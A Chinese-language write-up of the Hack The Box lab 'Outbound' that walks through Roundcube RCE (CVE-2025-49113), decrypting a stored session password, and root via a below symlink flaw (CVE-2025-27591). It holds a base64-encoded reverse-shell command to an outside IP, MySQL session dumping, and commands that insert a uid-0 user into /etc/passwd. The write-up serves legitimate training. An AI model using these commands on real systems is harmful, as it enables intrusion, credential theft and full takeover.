HTB-OutBound

Outbound

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

信息收集

nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

俩端口，有个子域名 mail.outbound.htb

Web

一个网页邮箱，RoundCube

用给的账号密码登录查看版本信息，发现是 1.6.10 ，查到有一个 RCE 漏洞，找到对应 CVE，CVE-2025-49113 - Roundcube Remote Code Execution

CVE-2025-49113

这个漏洞需要先登录，然后发送包含恶意 _from 参数的 HTTP 请求来触发漏洞

POC：https://github.com/hakaioffsec/CVE-2025-49113-exploit

php CVE-2025-49113.php <url> <username> <password> <command>

按照格式打，反弹 shell

php CVE-2025-49113.php http://mail.outbound.htb/ tyler "LhKL1o9Nm3X2" 'echo L3Vzci9iaW4vcGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjQ1IiwxMjM0KTtleGVjKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIik7Jw== | base64 -d | bash'

首先试了 sudo -l，但没用，在 tyler 用户下找到了关于数据库的东西

利用数据库查找 session 中的 password

在 /var/www/html/roundcube/config 目录下的 config.inc.php 文件发现了数据库相关配置

<?php

/*
 +-----------------------------------------------------------------------+
 | Local configuration for the Roundcube Webmail installation.           |
 |                                                                       |
 | This is a sample configuration file only containing the minimum       |
 | setup required for a functional installation. Copy more options       |
 | from defaults.inc.php to this file to override the defaults.          |
 |                                                                       |
 | This file is part of the Roundcube Webmail client                     |
 | Copyright (C) The Roundcube Dev Team                                  |
 |                                                                       |
 | Licensed under the GNU General Public License version 3 or            |
 | any later version with exceptions for skins & plugins.                |
 | See the README file for a full license statement.                     |
 +-----------------------------------------------------------------------+
*/

$config = [];

// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
//       or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';

// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';

// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';

// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';

// provide an URL where a user can get support for this Roundcube installation
// PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!
$config['support_url'] = '';

// Name your service. This is displayed on the login screen and in the window title
$config['product_name'] = 'Roundcube Webmail';

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

// List of active plugins (in plugins/ directory)
$config['plugins'] = [
    'archive',
    'zipdownload',
];

// skin name: folder from skins/
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';

根据信息登录数据库

$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'show databases;' -E

使用 roundcube 数据库

Database
information_schema
roundcube
Tables_in_roundcube
cache
cache_index
cache_messages
cache_shared
cache_thread
collected_addresses
contactgroupmembers
contactgroups
contacts
dictionary
filestore
identities
responses
searches
session
system
users

查询后发现有这些表，先看的 users 表，但是没有密码，查看 session 表

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from session;' -E

解密 session 的 var 字段

language|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";

有用户 jacob 的信息，password 和 auth_secret

password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW"

Decrypt Password

在 /var/www/html/roundcube/bin 下有一个 decrypt.sh可以直接解密了

拿到密码 595mO8DmwGeD

同样可以用另一种方法解密：

在 https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php 找到了相关解密函数

    public function get_crypto_method()
    {
        return $this->get('cipher_method') ?: 'DES-EDE3-CBC';
    }

* @param string $cipher Encrypted text
     * @param string $key    Encryption key to retrieve from the configuration, defaults to 'des_key'
     * @param bool   $base64 Whether or not input is base64-encoded
     *
     * @return string|false Decrypted text, false on error
     */
    public function decrypt($cipher, $key = 'des_key', $base64 = true)
    {
        // @phpstan-ignore-next-line
        if (!is_string($cipher) || !strlen($cipher)) {
            return false;
        }

        if ($base64) {
            $cipher = base64_decode($cipher, true);
            if ($cipher === false) {
                return false;
            }
        }

        $ckey = $this->config->get_crypto_key($key);
        $method = $this->config->get_crypto_method();
        $iv_size = openssl_cipher_iv_length($method);
        $tag = null;

        if (preg_match('/^##(.{16})##/s', $cipher, $matches)) {
            $tag = $matches[1];
            $cipher = substr($cipher, strlen($matches[0]));
        }

        $iv = substr($cipher, 0, $iv_size);

        // session corruption? (#1485970)
        if (strlen($iv) < $iv_size) {
            return false;
        }

        $cipher = substr($cipher, $iv_size);
        $clear = openssl_decrypt($cipher, $method, $ckey, \OPENSSL_RAW_DATA, $iv, $tag);

        return $clear;
    }

从上面的这些代码中可以得到加密方法为 DES-EDE3-CBC，也就是 3DES，iv 由密文经过 base64 解密然后再转为 hex 取前 8 个字节得到

最后结果为

iv：2fb46fd3403c4eec

des_key 在之前的文件中有

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

ssh 登录

登录 jacob 的账号，里面有邮件，拿到新密码 gY4Wr3a1evp4

拿到 userflag

CVE-2025-27591 利用 below 提权

sudo -l 发现有 below 权限

jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

直接搜 below 提权找到 CVE，Below：/var/log/below 全局可写目录导致本地提权漏洞 (CVE-2025-27591)

此漏洞允许本地用户通过以下方式将权限提升到 root：

1. 符号链接 /var/log/below/error_root.log 到 /etc/passwd
2. 触发 below 写入符号链接
3. 将恶意 root 用户注入 /etc/passwd

加密密码写入 /etc/passwd

└─# perl -e 'print crypt("butt3rf1y","abc")'
abvS2XoFvLJII

执行下面的命令

echo 'butt3rf1y:abvS2XoFvLJII:0:0:,,,:/root:/bin/bash' > butt3rf1y
rm error_root.log 
ln -s /etc/passwd /var/log/below/error_root.log
sudo /usr/bin/below
cp butt3rf1y error_root.log
su butt3rf1y

拿到 root 权限

后面 n0o0b 师傅跟我说只需要三行命令就能拿到 root

rm error_root.log
ln -s /etc/passwd error_root.log
sudo below
echo 'butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash' > /etc/passwd
su butt3rf1y

jacob@outbound:/var/log/below$ echo 'butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash' > /etc/passwd
jacob@outbound:/var/log/below$ su butt3rf1y
Password:
butt3rf1y@outbound:/var/log/below# id
uid=0(root) gid=0(root) groups=0(root)

直接链接覆盖权限，把 /etc/passwd 的权限覆盖了写入用户，这样确实更简单一点，又学到了